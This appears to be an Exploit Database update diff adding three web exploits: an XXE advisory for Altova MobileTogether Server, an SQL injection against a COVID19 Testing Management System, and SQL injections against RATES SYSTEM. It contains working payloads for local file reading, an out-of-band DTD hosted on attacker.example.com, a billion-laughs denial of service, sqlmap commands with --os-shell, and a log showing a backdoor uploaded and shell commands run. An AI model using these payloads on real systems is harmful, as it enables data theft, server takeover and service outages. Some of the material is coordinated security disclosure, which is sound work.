DB: 2021-08-13

3 changes to exploits/shellcodes

COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection
Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE)
RATES SYSTEM 1.0 - 'Multiple' SQL Injections

exploits/multiple/webapps/50191.txt

@@ -0,0 +1,344 @@
+# Exploit Title: Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE)
+# Date: 2021-08-10
+# Exploit Author: RedTeam Pentesting GmbH
+# Vendor Homepage: https://www.altova.com/mobiletogether-server
+# Version: 7.3
+# CVE: 2021-37425
+
+Advisory: XML External Entity Expansion in MobileTogether Server
+
+RedTeam Pentesting discovered a vulnerability in the MobileTogether
+server which allows users with access to at least one app to read
+arbitrary, non-binary files from the file system and perform server-side
+requests. The vulnerability can also be used to deny availability of the
+system. As an example, this advisory shows the compromise of the
+server's certificate and private key.
+
+
+Details
+=======
+
+Product: MobileTogether Server
+Affected Versions: 7.0-7.3, potentially earlier versions as well
+Fixed Versions: 7.3 SP1
+Vulnerability Type: XML External and Exponential Entity Expansion
+Security Risk: medium
+Vendor URL: https://www.altova.com/mobiletogether-server
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-002
+Advisory Status: published
+CVE: CVE-2021-37425
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37425
+
+
+Introduction
+============
+
+"MobileTogether Server is the processing powerhouse for your native iOS,
+Android, Windows, and browser-based apps.
+
+MobileTogether Server is the back-end hub for your solutions and acts as
+a gateway between end-users and your back-end data sources and
+infrastructure."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+MobileTogether Server is a back-end application hosting developed apps
+and provide access to various platforms and devices. Access to these
+apps is possible via native applications for devices and operating
+systems or directly via the browser. To access the MobileTogether
+server, depending on configuration either an anonymous login is possible
+or credentials are required.
+
+During analysis of the communication between a MobileTogether client
+application on a smartphone and the MobileTogether Server, HTTP requests
+were observed containing JSON as well as XML data. Generally, the XML
+data is used to signal changes in the UI or user-supplied input for the
+app hosted in MobileTogether Server.
+
+It was found that user-supplied XML external entities included in the
+described HTTP requests are resolved by the MobileTogether Server and
+the result is reflected in an HTTP response.
+
+This behaviour allows to read local files, perform server-side requests
+and also deny the availability of the service through XML exponential
+entity expansion. However, file disclosure is limited to non-binary
+files and the absolute path needs to be known in advance.
+
+
+Proof of Concept
+================
+
+MobileTogether Server comes with a series of example applications. To
+exploit the vulnerability, access to at least one application is
+required. In the following, the app EuroFXrates and the default user
+root with the default password root is used for demonstration of the
+vulnerability.
+
+The following HTTP request contains the minimal data required to be
+accepted by the server resulting in the processing of the XML data
+stored within the JSON field InfoSetChanges/Changes (formatted for
+better readability):
+
+------------------------------------------------------------------------
+POST /workflowmanagement HTTP/1.1
+Authorization: Basic cm9vdDpyb290
+Content-Type: application/json
+Content-Length: 851
+Host: 192.168.1.1:8085
+Connection: close
+
+{
+  "DeviceY": 0,
+  "ClientVersionName": "7.2.2",
+  "MobileManufacturer": "",
+  "AllInfosetsSerialized": true,
+  "ServerName": "192.168.1.1",
+  "ProtocolVersionMax": "2",
+  "Language": "en-US",
+  "DeviceType": "",
+  "ClientKey": "1_11148009037086584903_2744738433663963458",
+  "DeviceXDPI": 0,
+  "DeviceYDPI": 0,
+  "DeviceYCanvasWithTabs": 0,
+  "ClientArchiveVersionUUID": "{C022C8D8-8B2B-4D45-BD00-0DB942509EA3}",
+  "ProtocolVersionMin": "2",
+  "DeviceXCanvas": 0,
+  "ClientArchiveVersionMin": "-74",
+  "MobileOSVersion": "Android 11",
+  "DeviceXCanvasWithTabs": 0,
+  "ClientArchiveVersionMax": "65",
+  "User": "root",
+  "DeviceX": 0,
+  "DesignFileName": "/public/EuroFXrates",
+  "EncValue": "M9EBc6-7P5cd0",
+  "DeviceYCanvas": 0,
+  "MobileID": "5b39edd9-2533-4a61-ae66-b906893c5412",
+  "InfosetChanges": [
+    {
+      "Changes": [
+        {
+          "": "<?xml version=\"1.0\" encoding=\"utf-8\"?>
+               <Root>
+                 <SkipIntro>false</SkipIntro>
+               </Root>"
+        }
+      ],
+      "ID": "$$PERS$$"
+    }
+  ],
+  "DeviceIsPortrait": true
+}
+------------------------------------------------------------------------
+
+With the following XML data it can be verified that XML entities are
+resolved and reflected within predefined XML tags in the HTTP response:
+
+------------------------------------------------------------------------
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE Root [
+<!ENTITY redteam "RedTeam Pentesting">
+]>
+<Root>
+  <RedTeam>&redteam;</RedTeam>
+</Root>
+------------------------------------------------------------------------
+
+The HTTP response contains the resolved XML entity:
+
+------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Content-Type: text/html;charset=utf-8
+Server: CherryPy/18.1.0
+[...]
+
+[...]
+<?xml version=\"1.0\" encoding=\"utf-8\"?>
+<Root>
+  <RedTeam>RedTeam Pentesting</RedTeam>
+[...]
+------------------------------------------------------------------------
+
+The following example shows how local files can be read from the server
+system hosting the MobileTogether Server on a Windows system:
+
+------------------------------------------------------------------------
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE Root [
+<!ENTITY redteam SYSTEM "file://c:/windows/win.ini">
+]>
+<Root>
+  <RedTeam>&redteam;</RedTeam>
+</Root>
+------------------------------------------------------------------------
+
+The content of the file is shown below and formatted for better
+readability:
+
+------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Content-Type: text/html;charset=utf-8
+Server: CherryPy/18.1.0
+[...]
+
+[...]
+<?xml version=\"1.0\" encoding=\"utf-8\"?>
+<Root>
+  <RedTeam>
+    ; for 16-bit app support
+    [fonts]
+    [extensions]
+    [mci extensions]
+    [files]
+    [Mail]
+    MAPI=1
+  </RedTeam>
+[...]
+------------------------------------------------------------------------
+
+One interesting target for attackers could be the configuration file for
+the MobileTogether Server residing at the following fixed location:
+
+------------------------------------------------------------------------
+C:\ProgramData\Altova\MobileTogetherServer\mobiletogetherserver.cfg
+------------------------------------------------------------------------
+
+For example, if the server supports HTTPS, the absolute path to the
+server's certificate and private key is stored in its configuration.
+
+Furthermore, external XML entities can be used to access third-party
+websites as well as web services that are only available internally.
+Together with an externally hosted XML DTD, response information can be
+extracted:
+
+------------------------------------------------------------------------
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE root [
+<!ENTITY % start "<![CDATA[">
+<!ENTITY % content SYSTEM "http://internal.example.com">
+<!ENTITY % end "]]>">
+<!ENTITY % dtd SYSTEM "http://attacker.example.com/dtd.xml"> % dtd; ]>
+<Root>
+  <RedTeam>&redteam;</RedTeam>
+</Root>
+------------------------------------------------------------------------
+
+The DTD contains the following information:
+
+------------------------------------------------------------------------
+<!ENTITY redteam "%start;%content;%end;">
+------------------------------------------------------------------------
+
+In the HTTP response, the HTML markup delivered by internal.example.com
+is now visible.
+
+A further vulnerability attacks the availability of the service through
+XML exponential entity expansion. This is demonstrated with the
+following XML document:
+
+------------------------------------------------------------------------
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE root [
+<!ENTITY redteam0 "RedTeam Pentesting">
+<!ENTITY redteam1 "&redteam0; &redteam0;">
+<!ENTITY redteam2 "&redteam1; &redteam1;">
+<!ENTITY redteam3 "&redteam2; &redteam2;">
+<!ENTITY redteam4 "&redteam3; &redteam3;">
+<!ENTITY redteam5 "&redteam4; &redteam4;">
+<!ENTITY redteam6 "&redteam5; &redteam5;">
+<!ENTITY redteam7 "&redteam6; &redteam6;">
+<!ENTITY redteam8 "&redteam7; &redteam7;">
+<!ENTITY redteam9 "&redteam8; &redteam8;">
+<!ENTITY redteam10 "&redteam9; &redteam9;">
+<!ENTITY redteam11 "&redteam10; &redteam10;">
+<!ENTITY redteam12 "&redteam11; &redteam11;">
+<!ENTITY redteam13 "&redteam12; &redteam12;">
+<!ENTITY redteam14 "&redteam13; &redteam13;">
+<!ENTITY redteam15 "&redteam14; &redteam14;">
+<!ENTITY redteam16 "&redteam15; &redteam15;">
+<!ENTITY redteam17 "&redteam16; &redteam16;">
+<!ENTITY redteam18 "&redteam17; &redteam17;">
+<!ENTITY redteam19 "&redteam18; &redteam18;">
+<!ENTITY redteam20 "&redteam19; &redteam19;">
+]>
+<Root>
+  <RedTeam>&redteam20;</RedTeam>
+</Root>
+------------------------------------------------------------------------
+
+Sending the shown XML document leads to a huge server-side resource
+allocation which ultimately disrupts the availability of the
+MobileTogether Server.
+
+
+Workaround
+==========
+
+None known.
+
+
+Fix
+===
+
+According to the vendor, upgrading to version 7.3 SP1 resolves the
+vulnerability.
+
+
+Security Risk
+=============
+
+Attackers in possession of an account for a MobileTogether Server with
+access to at least one app are able to read files from the server
+system, conduct HTTP requests to external and internal systems and can
+also deny the availability of the service. Access might also be possible
+through default credentials or the anonymous user.
+
+
+Timeline
+========
+
+2021-06-21 Vulnerability identified
+2021-06-23 Requested a security contact from vendor
+2021-06-25 Security contact established with vendor
+2021-07-05 Customer approved disclosure to vendor
+2021-07-05 Vendor notified
+2021-07-20 Vendor acknowledged vulnerability
+2021-07-22 CVE ID requested
+2021-07-23 CVE ID assigned
+2021-07-28 Vendor released fixed version
+2021-08-10 Advisory released
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
+
+
+Working at RedTeam Pentesting
+=============================
+
+RedTeam Pentesting is looking for penetration testers to join our team
+in Aachen, Germany. If you are interested please visit:
+https://www.redteam-pentesting.de/jobs/
+
+-- 
+RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
+Dennewartstr. 25-27                       Fax : +49 241 510081-99
+52068 Aachen                    https://www.redteam-pentesting.de
+Germany                         Registergericht: Aachen HRB 14004
+Geschäftsführer:                       Patrick Hof, Jens Liebchen

exploits/php/webapps/50190.txt

@@ -0,0 +1,45 @@
+# Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection
+# Google Dork: intitle: "COVID19 Testing Management System"
+# Date: 09/08/2021
+# Exploit Author: Ashish Upsham
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
+# Version: v1.0
+# Tested on: Windows
+
+Description:
+
+The COVID19 Testing Management System 1.0 application from PHPgurukul is vulnerable to
+SQL injection via the 'searchdata' parameter on the patient-search-report.php page.
+
+==================== 1. SQLi ====================
+
+http://192.168.0.107:80/covid-tms/patient-search-report.php
+
+The "searchdata" parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
+user has the full ability to run system commands via --os-shell and fully compromise the system
+
+POST parameter 'searchdata' is vulnerable.
+
+step 1 : Navigate to the "Test Report >> Search Report" and enter any random value & capture the request in the proxy tool.
+step 2 : Now copy the post request and save it as test.txt file.
+step 3 : Run the sqlmap command "sqlmap -r test.txt -p searchdata --os-shell"
+
+----------------------------------------------------------------------
+Parameter: searchdata (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') AND (SELECT 4105 FROM (SELECT(SLEEP(5)))BzTl) AND ('Rxmr'='Rxmr&search=Search
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 5 columns
+    Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x59514b74537665486a414263557053556875425a6543647144797a5a497a7043766e597a484e6867,0x7176767871),NULL,NULL,NULL,NULL-- -&search=Search
+
+[19:14:14] [INFO] trying to upload the file stager on '/xampp/htdocs/' via UNION method
+[19:14:14] [INFO] the remote file '/xampp/htdocs/tmpuptfn.php' is larger (714 B) than the local file '/tmp/sqlmap_tng5cao28/tmpaw4yplu2' (708B)
+[19:14:14] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpuptfn.php
+[19:14:14] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpbmclp.php[19:14:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
+os-shell> whoami
+do you want to retrieve the command standard output? [Y/n/a] y
+command standard output:  'laptop-ashish\ashish'
+os-shell>

exploits/php/webapps/50192.txt

@@ -0,0 +1,80 @@
+# Exploit Title: RATES SYSTEM 1.0 - 'Multiple' SQL Injections
+# Date: 11-08-2021
+# Exploit Author: Halit AKAYDIN (hLtAkydn)
+# Software Link: https://www.sourcecodester.com/php/14904/rates-system.html
+# Version: V1.0
+# Category: Webapps
+# Tested on: Linux/Windows
+
+# Description:
+# PHP Dashboards is prone to an SQL-injection vulnerability
+# because it fails to sufficiently sanitize user-supplied data before using
+# it in an SQL query.Exploiting this issue could allow an attacker to
+# compromise the application, access or modify data, or exploit latent
+# vulnerabilities in the underlying database.
+
+# Vulnerable Request:
+
+POST /register.php HTTP/1.1
+Host: localhost
+Content-Length: 70
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/register.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=rou48ptlhqkrlt68jpd9ugndgf
+Connection: close
+
+ClientId=0001&email=hltakydn%40pm.me&pwd1=123456&pwd2=123456&register=
+
+# Vulnerable Payload:
+# Parameter: ClientId (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+ClientId=ojEY' AND (SELECT 4947 FROM (SELECT(SLEEP(10)))haeq) AND 'mdgj'='mdgj&email=&pwd1=iYkb&pwd2=&register=oQCR
+
+--------------------------------------------------------------------------------------------------------------------------
+
+# Vulnerable Request:
+
+POST /passwordreset.php HTTP/1.1
+Host: localhost
+Content-Length: 61
+Cache-Control: max-age=0
+sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/passwordreset.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=a8600labr48ehj6d8716ho0h61
+Connection: close
+
+loginId=1&clientId=1&email=hltakydn%40pm.me&pwd=123456&reset=
+
+# Vulnerable Payload:
+# Parameter: loginId (POST)
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload:
+
+loginId=FPDr' AND (SELECT 4535 FROM (SELECT(SLEEP(10)))SJvL) AND 'rtGr'='rtGr&clientId=&email=VXzw&pwd=&reset=xlcX

files_exploits.csv

@@ -44319,3 +44319,6 @@ id,file,description,date,author,type,platform,port
 50186,exploits/php/webapps/50186.txt,"WordPress Plugin LifterLMS 4.21.1 - Access Other Student Grades/Answers via IDOR",2021-08-10,Captain_hook,webapps,php,
 50187,exploits/php/webapps/50187.txt,"WordPress Plugin Picture Gallery 1.4.2 - 'Edit Content URL' Stored Cross-Site Scripting (XSS)",2021-08-10,"Aryan Chehreghani",webapps,php,
 50189,exploits/php/webapps/50189.txt,"Simple Library Management System 1.0 - 'rollno' SQL Injection",2021-08-10,"Halit AKAYDIN",webapps,php,
+50190,exploits/php/webapps/50190.txt,"COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection",2021-08-12,"Ashish Upsham",webapps,php,
+50191,exploits/multiple/webapps/50191.txt,"Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE)",2021-08-12,"RedTeam Pentesting GmbH",webapps,multiple,
+50192,exploits/php/webapps/50192.txt,"RATES SYSTEM 1.0 - 'Multiple' SQL Injections",2021-08-12,"Halit AKAYDIN",webapps,php,